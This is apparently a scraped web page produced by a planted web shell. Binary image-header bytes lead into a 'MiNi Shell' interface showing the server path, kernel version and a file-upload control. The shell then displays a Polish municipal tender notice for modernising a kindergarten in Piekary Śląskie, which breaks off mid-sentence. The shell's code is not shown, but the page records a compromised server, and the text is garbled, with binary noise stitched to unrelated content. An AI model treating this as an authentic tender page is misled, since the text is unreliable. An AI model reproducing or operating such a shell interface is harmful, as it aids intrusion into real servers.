JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211112/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211112/0026695603-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> „Termomodernizacja i modernizacja Miejskiego Przedszkola nr 1 w Piekarach Śląskich”, Część 1 – Termomodernizacja i modernizacja, Część 2 – Dostawa i montaż wiaty śmietnikowej.” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Piekary Śląskie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 276255418</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Bytomska 84</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Piekary Śląskie</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">41-940</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL228 - Bytomski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">323939379</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">bzp@piekary.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://piekary.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Termomodernizacja i modernizacja Miejskiego Przedszkola nr 1 w Piekarach Śląskich”, Część 1 – Termomodernizacja i modernizacja, Część 2 – Dostawa i montaż wiaty śmietnikowej.” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-9951d74a-43b2-11ec-8c2d-66c2f1230e9c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00266956</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">03</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-11-12</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00001004/15/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.1 Termomodernizacja i modernizacja Miejskie-go Przedszkola nr 1</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> w ramach Regionalnego Programu Operacyjnego Województwa Śląskiego na lata 2014 – 2020, Oś Priorytetowa IV „Efektywność energetyczna, odnawialne źródła energii i gospodarka niskoemisyjna”, Działanie 4.3. </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://josephine.proebiz.com/pl/promoter/tender/15813/summary <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1) poprzez Platformę przetargową<br/>pod adresem: https://josephine.proebiz.com/pl/ (zwanej dalej zamiennie Platformą przetargową), w<br/>wierszu oznaczonym tytułem oraz znakiem niniejszego postępowania<br/>lub<br/>2) pocztą elektroniczną na adres e-mail Zamawiającego: bzp@piekary.pl oraz adresy e mail<br/>Wykonawców podane w formularzach ofertowych. Po otwarciu ofert kontakt przez adres e-mail będzie<br/>możliwy tylko poprzez adres(adresy) wskazany w formularzu ofertowym.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.<br/>Wykonawca zamierzający złożyć ofertę (wyłącznie poprzez Platformę przetargową) – zobowiązany jest<br/>zapoznać się z instrukcjami użytkowników Platformy przetargowej - dostępnymi pod adresem<br/>https://josephine.proebiz.com/pl/ oraz zaakceptować regulamin korzystania z Platformy przetargowej.<br/>2. Złożenie oferty poprzez Platformę przetargową oznacza akceptację regulaminu, o którym mowa w<br/>ust. 1 niniejszego rozdziału SWZ.<br/>3. Wymagania techniczne związane z korzystaniem z Platformy przetargowej – wskazane są na stronie<br/>internetowej Platformy przetargowej - pod adresem:<br/>https://josephine.proebiz.com/pl/<br/>4. Wsparcia technicznego w zakresie działania Platformy przetargowej udziela jej dostawca, tj.<br/>PROEBIZ s.r.o., Masarykovo náměstí 52/33, CZ - 702 00 Ostrava - Moravská Ostrava, C.9176, nr tel.<br/>+48 222 139 900, e-mail: houston@proebiz.com od poniedziałku do piątku (dni robocze) w godz. 8.00 –<br/>16.00.<br/>5. Sposoby złożenia oferty za pośrednictwem Platformy przetargowej oraz potwierdzenia złożenia<br/>oferty, zostały opisane w Instrukcjach użytkowników Platformy przetargowej.<br/><br/><br/>6. Oferty, oświadczenia, o których mowa w art. 125 ust. 1 ustawy, podmiotowe środki dowodowe, w tym<br/>oświadczenie, o którym mowa w art. 117 ust. 4 ustawy, oraz zobowiązanie podmiotu udostępniającego<br/>zasoby, o którym mowa w art. 118 ust. 3 ustawy, zwane dalej „zobowiązaniem podmiotu<br/>udostępniającego zasoby”, przedmiotowe środki dowodowe, pełnomocnictwo, sporządza się w postaci<br/>elektronicznej, w formatach danych określonych w przepisach wydanych na podstawie art. 18 ustawy z<br/>dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne (Dz.U.<br/>z 2020 r. poz. 346, 568, 695, 1517 i 2320), z zastrzeżeniem formatów, o których mowa w art. 66 ust. 1<br/>ustawy, z uwzględnieniem rodzaju przekazywanych danych.<br/>7. Zamawiający informuje, iż w przypadku przesyłania przez Wykonawcę dokumentów elektronicznych<br/>skompresowanych (w tym oferty przetargowej) dopuszczone są wyłącznie formaty danych wskazane w<br/>Rozporządzeniu Rady Ministrów z dnia 12 kwietnia 2012 r. (t.j. Dz. U. z 2017 r., poz. 2247) w sprawie<br/>Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany<br/>informacji w postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych.<br/>Powyższe oznacza, iż Zamawiający nie dopuszcza przysyłania dokumentów elektronicznych (w tym<br/>oferty) skompresowanych formatem .rar<br/>8. Informacje, oświadczenia lub dokumenty, inne niż określone w ust. 6 niniejszego rozdziału SWZ,<br/>przekazywane w postępowaniu o udzielenie zamówienia, sporządza się w postaci elektronicznej, w<br/>formatach danych określonych w przepisach wydanych na podstawie art. 18 ustawy z dnia 17 lutego<br/>2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne lub jako tekst wpisany<br/>bezpośrednio do wiadomości przekazywanej przy użyciu środków komunikacji elektronicznej,<br/>wskazanych przez Zamawiającego w niniejszej SWZ.<br/>9. W przypadku, gdy dokumenty elektroniczne w postępowaniu o udzielenie zamówienia,<br/>przekazywane przy użyciu środków komunikacji elektronicznej, zawierają informacje stanowiące<br/>tajemnicę przedsiębiorstwa w rozumieniu przepisów ustawy z dnia 16 kwietnia 1993 r. o zwalczaniu<br/>nieuczciwej konkurencji (Dz. U. z 2020 r. poz. 1913), Wykonawca, w celu utrzymania w poufności tych<br/>informacji, przekazuje je w wydzielonym i odpowiednio oznaczonym pliku.<br/>10. Podmiotowe środki dowodowe, przedmiotowe środki dowodowe oraz inne dokumenty lub<br/>oświadczenia, sporządzone w języku obcym przekazuje się wraz z tłumaczeniem na język polski.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Informujemy, że zgodnie z art. 13 ust. 1 i ust. 2 ogólnego<br/>rozporządzenia o ochronie danych osobowych z dnia 27 kwietnia 2016 r. (dalej RODO):<br/>1. Administratorem Pani/Pana danych jest Prezydent Miasta w Piekarach Śląskich z siedzibą przy ul.<br/>Bytomskiej 84, 41-940 Piekary Śląskie, tel.32/3939411 (centrala), bip.piekary.pl , adres e-mail:<br/>um@piekary.pl.<br/>2. Wyznaczony został Inspektor ochrony danych, z którym można się skontaktować w sprawie ochrony<br/>swoich danych pod adresem – e-mail: dane.osobowe@piekary.pl. lub pisemnie na adres siedziby<br/>Administratora wskazany powyżej. Jakakolwiek zmiana osoby wyznaczonej na Inspektora ochrony<br/>danych nie będzie wpływała na wskazane sposoby kontaktu.<br/>3. Pani/Pana dane będą przetwarzane w celu prowadzenia procedury przetargowej, w wyniku której<br/>zostanie wybrany wykonawca, z którym zostanie zawarta umowa w sprawie zamówienia publicznego,<br/>zgodnie z art. 6 ust. 1 lit. c RODO, w związku z postanowieniami ustawy PZP z dnia 11 września 2019r.<br/>4. Z poszanowaniem poufnego charakteru Pani/Pana danych, w tym stosując mechanizmy<br/>minimalizujące liczbę przekazywanych danych oraz ograniczając możliwość przekazywania danych o<br/>charakterze wrażliwym Pani/Pana dane osobowe będą ujawniane podmiotom i osobom upoważnionym<br/>na podstawie przepisów prawa:<br/>- LTC spółka z o.o. z siedzibą przy ul. Pabianickiej 159/161, 93-490 Łódź, której powierzono dane w<br/>związku z asystą techniczną elektronicznego systemu obiegu dokumentów w Urzędzie Miasta Piekary<br/>Śląskie.<br/>- uczestnikom i wszystkim zainteresowanym prowadzonymi postępowaniami przetargowymi,<br/>- operatorowi pocztowemu lub kurierowi (w przypadku korespondencji papierowej)<br/>- ponadto w zakresie stanowiącym informację publiczną dane będą ujawniane każdemu<br/>zainteresowanemu taką informacją.<br/>5. Pani/Pana dane osobowe będą przechowywane jedynie w okresie niezbędnym do realizacji celu o<br/>którym mowa w ust. 3. Po zrealizowaniu tego celu dane osobowe będą przechowywane w celach<br/>archiwalnych przez okres 5 lat- dokumentacja zamówień publicznych, 10 lat – umowy w sprawie<br/>zamówienia publicznego, zgodnie z postanowieniami Rozporządzenia Prezesa Rady Ministrów z dnia<br/>18 stycznia 2011 r. w sprawie instrukcji kancelaryjnej, jednolitych rzeczowych wykazów akt oraz<br/>instrukcji w sprawie organizacji i zakresu działania archiwów zakładowych. Okres przetwarzania może<br/>ulec zmianie ze względu na inne przepisy prawa.<br/>6. Przysługuje Pani/Panu prawo dostępu do treści swoich danych oraz prawo do żądania ich<br/>sprostowania w takim zakresie, w jakim wskazane dane są niezgodne ze stanem faktycznym,<br/>usunięcia, jeżeli dane nie są niezbędne do wywiązania się z obowiązku wynikającego z przepisu prawa<br/>lub w ramach sprawowania władzy publicznej oraz do ograniczenia przetwarzania. Ponadto ma<br/>Pani/Pan prawo wniesienia sprzeciwu wobec przetwarzania. W celu skorzystania z ww. należy<br/>skontaktować się z administratorem lub Inspektorem Ochrony Danych.<br/>7. Podanie danych jest wymogiem ustawowym. Niepodanie uniemożliwia wzięcie udziału w procedurze<br/>wyboru wykonawcy.<br/>8. Administrator danych osobowych, na mocy art.17 ust. 3 lit. b RODO, ma prawo odmówić usunięcia<br/>Pani/Pana danych osobowych.<br/>9. Przysługuje Pani/Panu prawo wniesienia skargi do organu nadzorczego właściwego ds. ochrony<br/>danych osobowych – Prezesa Urzędu Ochrony Danych Osobowych, jeśli uzna Pani/Pan, iż przepisy<br/>RODO zostały naruszone;<br/>10. Pani/Pana dane osobowe nie będą wykorzystywane do zautomatyzowanego podejmowania decyzji<br/>ani profilowania, o którym mowa w art. 22.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">BZP.271-48/IG/21</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> I.	CZĘŚĆ 1 - Termomodernizacja i modernizacja:<br/>a)	Roboty demontażowe / rozbiórkowe:<br/><br/>•	istniejącego ogrodzenia, bram, furtek – ok. 75 mb,<br/>•	nawierzchni zagospodarowania terenu – ok. 50,1 m2,<br/>•	częściowe rozbiórki stropów, ścian,<br/>•	schodów zewnętrznych – 1 kpl,<br/>•	konstrukcji dachu – ok. 540 m2,<br/>•	papy na dachach – ok. 540 m2,<br/>•	pieca kaflowego kuchni – 1 kpl,<br/>•	istniejącej stolarki okiennej i drzwiowej – 65 szt, <br/>•	wycinki zieleni,<br/>•	demontaż, składowanie, zabezpieczenie i ponowny montaż istniejącej instalacji fotowoltaicznej wraz z niezbędnymi pomiarami i uruchomieniem – 1 kpl,<br/>•	demontaż, sortowanie, składowanie, załadunek, rozładunek, wywóz, utylizacja materiałów pochodzących z rozbiórek i demontaży,<br/>•	demontaż istniejącej kanalizacji sanitarnej, hydrantowej, c.o., wod-kan,<br/>•	<br/><br/>b)	Roboty budowlane:<br/><br/>•	wykopy – ok. 365 m3,<br/>•	izolacja i docieplenie ścian fundamentowych – ok. 300 m2,<br/>•	opaska – ok. 31,2 m2,<br/>•	docieplenie podłóg na gruncie – ok. 323 m2,<br/>•	docieplenie poddasza – ok. 370 m2,<br/>•	pokrycie dachu wraz z obróbkami – ok. 540 m2,<br/>•	stolarka okienna – 46 szt,<br/>•	stolarka drzwiowa wewnętrzna i zewnętrzna - 17+2 szt.<br/>•	docieplenie elewacji – ok. 636,23 m2,<br/>•	zadaszenia szklane – 1 szt,<br/>•	klapa i wyłaz dachowy – 1+1 szt,<br/>•	wyłaz poddasza ze schodami – 1 szt,<br/>•	ślusarka p.poż. – 17 szt,<br/>•	schody wewnętrzne – ok. 15,55 m2,<br/>•	posadzki – ok. 675 m2,<br/>•	ściany – ok. 1848 m2,<br/>•	sufity – ok. 675 m2,<br/>•	dostawa i montaż wyposażenia (technologia kuchni),<br/>•	dostawa i montaż wyposażenia (pralnia, łazienki),<br/>•	droga p.poż. – ok. 747 m2,<br/>•	chodniki – ok. 64 m2,<br/>•	projektowane ogrodzenie – ok. 86 mb,<br/>•	bramy i furtki – 2+3 szt,<br/>•	odtworzenia nawierzchni, <br/>•	nasadzenia zastępcze – 4 szt,<br/><br/>c)	Roboty sanitarne:<br/><br/>•	nowa instalacja c.o. wraz z wpięciem do istniejącego węzła cieplnego – ok. 379,0 mb,<br/>•	izolacja instalacji centralnego ogrzewania – ok. 379,0 mb,<br/>•	zabudowa grzejników płytowych wraz z zaworami odcinającymi i termoregulacyjnymi, głowicami termostatycznymi i odpowietrznikami – 38 szt,<br/>•	osłony grzejnikowe – 38 szt, <br/>•	instalacja ciepła technologicznego wentylacji kuchni wraz z izolacją, armaturą zaworową, pompą obiegową – ok. 10,0 mb, <br/>•	włączenie do istniejącego przyłącza wodociągowego w piwnicy,<br/>•	wodomierz – 1 szt,<br/>•	instalacja ciepłej wody użytkowej i cyrkulacji wraz z izolacją rurociągów – ok. 329,0 mb,<br/>•	instalacja zimnej wody wraz z izolacją rurociągów – ok. 343,0 mb,<br/>•	zabudowa zaworów i armatury dla instalacji zimnej wody, ciepłej wody użytkowej i cyrkulacji,<br/>•	zlewozmywaki ze stali nierdzewnej – 8 kpl, <br/>•	umywalki z syfonem gruszkowym i bateriami – 17 kpl, <br/>•	miski ustępowe wiszące wraz ze stelażem, deską sedesową i przyciskiem ze stali nierdzewnej – 12 kpl,<br/>•	brodziki natryskowe wraz z bateriami – 3 szt,<br/>•	wewnętrzna kanalizacja sanitarna wraz z włączeniem się do zewnętrznej kanalizacji sanitarnej – ok. 220 mb,<br/>•	podejścia odpływowe kanalizacyjne – 40 podejść,<br/>•	wpusty ściekowe podłogowe – 5 szt,<br/>•	czyszczaki kanalizacyjne – 11 szt,<br/>•	rury wywiewne kanalizacji sanitarnej – 2 szt, <br/>•	podposadzkowa przepompownia ścieków szarych – 1 kpl,<br/>•	wentylacja mechaniczna nawiewna dla kuchni (przewody, przepustnice i armatura, izolacje, urządzenia wentylacyjne, aparatura kontrolno-pomiarowa i sterowanie),<br/>•	wentylacja mechaniczna wywiewna dla kuchni (przewody, urządzenia wentylacyjne, izolacje, kratki wentylacyjne, zawory wentylacyjne, aparatura kontrolno- pomiarowa i sterowanie),<br/>•	okap kuchenny nawiewno-wywiewny – 1 szt,<br/>•	hybrydowe nasady wentylacyjne – 19 szt,<br/>•	nawietrzaki podokienne wraz z grzałką elektryczną – 13 szt,<br/>•	wewnętrzna instalacja gazowa do kuchni – ok. 10,0 mb, <br/>•	armatura instalacji gazowej (zawory, filtry, kurki gazowe),<br/>•	detekcja gazu dla kuchni – 1 kpl,<br/>•	wewnętrzna instalacja hydrantowa wraz z izolacją przeciwroszeniową – ok. 52,0 mb,<br/>•	szafki hydrantowe wnękowe z zaworem hydrantowym, wężem i prądownicą – 7 szt,<br/>•	zawór pierwszeństwa wraz z presostatem – 1 szt,<br/>•	układ podnoszenia ciśnienia (hydroforownia) – 1 kpl,<br/>•	wykonanie przebić, bruzdowań, zamurowań, napraw po montażu instalacji centralnego ogrzewania, zimnej wody, ciepłej wody użytkowej i cyrkulacji, instalacji p.poż., wentylacji, <br/>•	wykonanie wszelkich koniecznych badań, prób i rozruchów wraz z protokołami,<br/><br/>d)	Roboty elektryczne i niskoprądowe:<br/><br/>•	główna linia zasilająca, wraz z złączam, zaciskami i rurą (od wieszaka hakowego) długości ok. 35 m,<br/>•	wyniesienie licznika energii elektrycznej do złącza na elewacji - 1 kpl,<br/>•	zabudowa złącza przeciwpożarowego wyłącznika prądu dla budynku oraz instalacji fotowoltaicznej – 2 kpl,<br/>•	zabudowa kompletnej instalacji oddymiania klatki schodowej - 1 kpl centrala, 4 kpl czujek dymu,<br/>•	układ zasilania w energię elektryczną,<br/>•	rozdzielnica elektryczna główna oraz rozdzielnice obiektowe - 5 kpl,<br/>•	instalacja przeciwpożarowego wyłącznika prądu budynku oraz instalacji fotowoltaicznej - 2 kpl,<br/>•	wewnętrzne linie zasilające – ok. 325 mb,<br/>•	instalacja oświetlenia podstawowego wraz z osprzętem i sterowaniem – 144 kpl opraw,<br/>•	instalacja oświetlenia awaryjnego – 61 kpl opraw,<br/>•	instalacja okablowania zasilającego urządzenia elektryczne – ok. 4400 mb,<br/>•	instalacja gniazd wtyczkowych w tym siłowych – 129 kpl,<br/>•	instalacja monitoringu wizyjnego – 30 kpl kamer,<br/>•	instalacja domofonowa, <br/>•	instalacja sygnalizacji włamania i napadu wraz z elementami kontroli dostępu,<br/>•	instalacja okablowania strukturalnego – ok. 1900 mb,<br/>•	instalacja uziemienia i połączeń wyrównawczych – ok. 580 mb,<br/>•	instalacja odgromowa – ok. 265 mb,<br/>•	wykonanie wszelkich koniecznych badań wraz z protokołami,<br/>•	instalacja kompletnych szaf typu RACK – 1 kpl. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">5 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">- zakres zamówienia: roboty przygotowawcze, rozbiórkowe, demontażowe, kucia, przebicia, odbicia, przejścia, bruzdowania, roboty ziemne, zagospodarowanie terenu, roboty nawierzchniowe, montażowe, murarskie, konstrukcyjne, odtworzeniowe, roboty instalacyjne: c.o., wod-kan, sanitarne, wentylacyjne i klimatyzacyjne, gazowe, zasilające, elektryczne, oświetleniowe, odgromowe, silnoprądowe, niskoprądowe, p.poż., oddymiania, wideodomofonowe, sygnalizacji włamań i napadu, monitoringu, fotowoltaiki, okablowania strukturalnego wraz z armaturą, urządzeniami i wyposażeniem, roboty ogólnobudowlane, tynkarskie, malarskie, płytkarskie, posadzkowe, ścienne, sufitowe, okładzinowe, izolacyjne, dociepleniowe, elewacyjne, fundamentowe, blacharskie, dekarskie, rynnowe, wykończeniowe, roboty w zakresie okablowania, orurowania, podłączenia, przełączenia, uruchomienia, badania, roboty w zakresie stolarki okiennej i drzwiowej, ogrodzenia, bramy, furtki. <br/><br/> - warunki udzielenia zamówienia: w przypadku wniosku użytkownika, dostosowanie obiektu do obowiązujących przepisów, sytuacje i zdarzenia losowe, wykonanie zakresu robót w związku z koniecznością usunięcia niekorzystnych warunków terenowych lub fizycznych napotkanych w trakcie realizacji robót (przeszkody terenowe lub przeszkody formalno – 